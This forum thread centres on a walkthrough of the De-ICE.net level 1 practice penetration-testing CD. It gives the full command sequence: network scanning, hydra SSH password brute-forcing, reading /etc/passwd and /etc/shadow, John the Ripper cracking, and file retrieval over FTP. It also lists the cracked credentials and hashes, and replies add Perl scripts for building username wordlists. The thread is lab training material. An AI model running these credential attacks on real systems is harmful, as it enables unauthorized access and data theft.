[Video] De-ICE.net v1.0 (1.100) {Level 1 - Disk 1}
De-ICE.net v1.0 (1.100) {Level 1 - Disk 1}
NOT DISK 2
Links
Watch video on-line: http://g0tmi1k.blip.tv/file/3194722
Download video: http://www.mediafire.com/?994f2o5ekdqqpzm
What is this?
This is my walk though of how I broke into the De-ICE.net network, level 1, disk 1.
The De-ICE.net network is on a "live PenTest CD", that creates a target(s) on which to practise penetration testing; it has an "end goal" to reach.
What do I need?
> BackTrack 4 (Final)
> de-ice.net-1.100-1.0.iso (MD5: a3341316ca9860b3a0acb06bdc58bbc1)
> Dictionary(s)
Software
Name: De-ICE.net
Version: 1.0 (Level 1 - Disk 1 - IP Address: 1.100)
Home Page: http://www.de-ice.net or http://heorot.net/livecds/
Download Link:
Forums/Support: http://forums.heorot.net andhttp://forums.heorot.net/viewtopic.php?f=16&t=13
WiKi/Support: http://de-ice.net/hackerpedia/index...._PenTest_Disks
Commands:
Code:
nmap -n 192.168.1.1-255
nmap -n -sS -sV -O 192.168.1.100
firefox 192.168.1.100
[+]kate -> make list of possible usernames. Save. Filename: usernames
// lastF, fLast
hydra 192.168.1.100 ssh2 -L /root/usernames -p password -e s
ssh bbanter@192.168.1.100
// "Yes" if quiz about trusting authenticity. Password: bbanter
cd /etc/
cat passwd
[+]kate -> Update usernames. Save.
cat group
exit
cd /root/tools/dictionary/
cat common-1 common-2 common-3 common-4 wordlist.txt >> /root/passwords
hydra 192.168.1.100 ssh2 -V -l aadams -P /root/passwords
ssh aadams@192.168.1.100
// Password: nostradamus
cd /etc/
sudo cat shadow
// Password: nostradamus
[+]kate -> New -> Paste -> Save. Filename: shadow
exit
john
./john --rules --wordlist=/root/passwords --users=root /root/shadow
// Password: tarot
ssh aadams@192.168.1.100
// Password: nostradamus
su
// Password: tarot
ls -a
cd ..
ls -a
cd ftp
/
ls -a
cd incoming/
ls -a
openssl enc -d -aes-128-cbc -in salary_dec2003.csv.enc -out salary.csv -k tarot
cd /etc/
vi vsftpd.conf
// edit (by pressing i) vsftpd.conf to have a '#' in front of 'listen=YES' (last line). Then save it (:w), and exit (:quit)
modprobe capability
exit
exit
ftp 192.168.1.100
// User: root. Password: tarot
ls -a
cd ..
ls -a
cd home
ls -a
cd ftp
ls -a
cd incoming
ls -a
get salary.csv
cd /pentest/passwords/jtr
ls
mv salary.csv ~
[+]kate -> salary.csv
// GAME OVER
----------------------------------------------------------------------------------------------------
Users
root:tarot = root:$1$TOi0HE5n$j3obHaAlUdMbHQnJ4Y5Dq0:13553:0:::::
aadams:nostradamus = aadams:$1$6cP/ya8m$2CNF8mE.ONyQipxlwjp8P1:13550:0:99999:7:::
bbanter:bbanter = bbanter:$1$hl312g8m$Cf9v9OoRN062STzYiWDTh1:13550:0:99999:7:::
ccoffee:hierophant = ccoffee:$1$nsHnABm3$OHraCR9ro.idCMtEiFPPA.:13550:0:99999:7:::
----------------------------------------------------------------------------------------------------
Notes:
Song: Aly & Fila - Khepera
Video length: 04:11
Capture length: 08:52
Blog Post: http://g0tmi1k.blogspot.com/2010/02/...-1-disk-1.html
Forum Post: http://www.backtrack-linux.org/forums/backtrack-videos/1662-%5Bvideo%5D-de-ice-net-v1-1-1-100-%7Blevel-1-disk-2%7D.html ORhttp://heorot.net/forums/viewtopic.php?f=16&t=367
Dictionaries: http://g0tmi1k.blogspot.com/2010/02/...tionaries.html
Re: [Video] De-ICE.net v1.1 (1.100) {Level 1 - Disk 2}
Good job. :) Thanks for submitting this. There's one of the last steps I don't understand though.
Code:
openssl enc -d -aes-128-cbc -in salary_dec2003.csv.enc -out salary.csv -k tarot
How did you find out what encryption the file had? Also, out of curiosity, did you just assume the root password was the right key from the beginning or did you brute force this as well before? :)
Would be grateful for an answer!
Re: [Video] De-ICE.net v1.1 (1.100) {Level 1 - Disk 2}
Quote:
Originally Posted by
randalth0r
Good job. :) Thanks for submitting this. There's one of the last steps I don't understand though.
Code:
openssl enc -d -aes-128-cbc -in salary_dec2003.csv.enc -out salary.csv -k tarot
How did you find out what encryption the file had? Also, out of curiosity, did you just assume the root password was the right key from the beginning or did you brute force this as well before? :)
Would be grateful for an answer!
Trial and error with a bit of googling ;)
and after JTR told me what it thought the root password was, I went with it.
Re: [Video] De-ICE.net v1.1 (1.100) {Level 1 - Disk 2}
Nice work, I'm going to have a go at one of the disks once I get it downloaded.
Where are those wordlists you found?
Re: [Video] De-ICE.net v1.1 (1.100) {Level 1 - Disk 2}
Quote:
Originally Posted by
rshift
Nice work, I'm going to have a go at one of the disks once I get it downloaded.
Where are those wordlists you found?
rshift, he's hosting his wordlists on mediafire, u can find links on his blog @ g0tmi1k dot blogspot dot com and search for "February Update - ISOs and Dictionaries"
g0tmi1k i see that you cut and paste your usernames' last letter to the beginning for added brute force possibilities. here are two ways to do it with perl.. also a capitalization switcher for the first letter of each word.. theres probably a much easier way to code these but im new to perl and just did it for the challenge. i didnt bother using filehandles in the script to save output to a new file u can just redirect it on command line...
One way to do it:
Code:
#! /usr/bin/perl
# Usage: perl <filename.pl> <userlist>
# moves last character of a word to the beginning.
while (<>) {
print $_;
chomp $_;
$char=(chop $_);
$str=$_;
print "$char$str\n";
}
Another way:
Code:
#! /usr/bin/perl
# Usage: perl <filename.pl> <userlist>
# moves last character of a word to the beginning.
print $_;
$len = length $_;
$len = $len-2;
$last_letter = substr($_, $len, 1);
$first_letters = substr($_, 0, $len);
print "$last_letter$first_letters\n";
}
This will change the first letter of each word from upper to lowercase and vice versa.
Code:
#! /usr/bin/perl
# Usage: perl <filename.pl> <userlist>
while (<>) {
print;
@chars = split '', $_;
$char = shift(@chars);
if ($char =~ /[A-Za-z]/) {
$char =~ tr/A-Za-z/a-zA-Z/;
unshift(@chars, $char);
print @chars;
} else {
}
}
Re: [Video] De-ICE.net v1.1 (1.100) {Level 1 - Disk 2}
mastodongle, here's an easier way to toggle first letter caps, no need for if/else or variables ;)
Code:
#! /usr/bin/perl
# usage: perl <filename.pl> <userlist>
while (<>) {
s/(^\w)/\u$1/gi;
print;
s/(^\w)/\l$1/gi;
print;
}
Re: [Video] De-ICE.net v1.1 (1.100) {Level 1 - Disk 2}
Quote:
Originally Posted by
g0tmi1k
Trial and error with a bit of googling ;)
and after JTR told me what it thought the root password was, I went with it.
lol ??????? that is the magic ?
Re: [Video] De-ICE.net v1.1 (1.100) {Level 1 - Disk 2}
Quote:
Originally Posted by
rshift
Nice work, I'm going to have a go at one of the disks once I get it downloaded.
Where are those wordlists you found?
Im hosting them on my blog:
g0tmi1k: [Site News] February Update - ISOs and Dictionaries
Quote:
Originally Posted by
mastodongle
rshift, he's hosting his wordlists on mediafire, u can find links on his blog @ g0tmi1k dot blogspot dot com and search for "February Update - ISOs and Dictionaries"
g0tmi1k i see that you cut and paste your usernames' last letter to the beginning for added brute force possibilities. here are two ways to do it with perl.. also a capitalization switcher for the first letter of each word.. theres probably a much easier way to code these but im new to perl and just did it for the challenge. i didnt bother using filehandles in the script to save output to a new file u can just redirect it on command line...
One way to do it:
Code:
#! /usr/bin/perl
# Usage: perl <filename.pl> <userlist>
# moves last character of a word to the beginning.
while (<>) {
print $_;
chomp $_;
$char=(chop $_);
$str=$_;
print "$char$str\n";
}
Another way:
Code:
#! /usr/bin/perl
# Usage: perl <filename.pl> <userlist>
# moves last character of a word to the beginning.
print $_;
$len = length $_;
$len = $len-2;
$last_letter = substr($_, $len, 1);
$first_letters = substr($_, 0, $len);
print "$last_letter$first_letters\n";
}
This will change the first letter of each word from upper to lowercase and vice versa.
Code:
#! /usr/bin/perl
# Usage: perl <filename.pl> <userlist>
while (<>) {
print;
@chars = split '', $_;
$char = shift(@chars);
if ($char =~ /[A-Za-z]/) {
$char =~ tr/A-Za-z/a-zA-Z/;
unshift(@chars, $char);
print @chars;
} else {
}
}
Thanks for helping out (with the links & script)
Yeah, thinking about it. I should of created/used a script for the video. *Ill use them next time as Ive added them to my collection!*
Quote:
Originally Posted by
micawber
mastodongle, here's an easier way to toggle first letter caps, no need for if/else or variables ;)
Code:
#! /usr/bin/perl
# usage: perl <filename.pl> <userlist>
while (<>) {
s/(^\w)/\u$1/gi;
print;
s/(^\w)/\l$1/gi;
print;
}
Handy to know! ;)
Quote:
Originally Posted by
tyl3rs123
lol ??????? that is the magic ?
Sure?
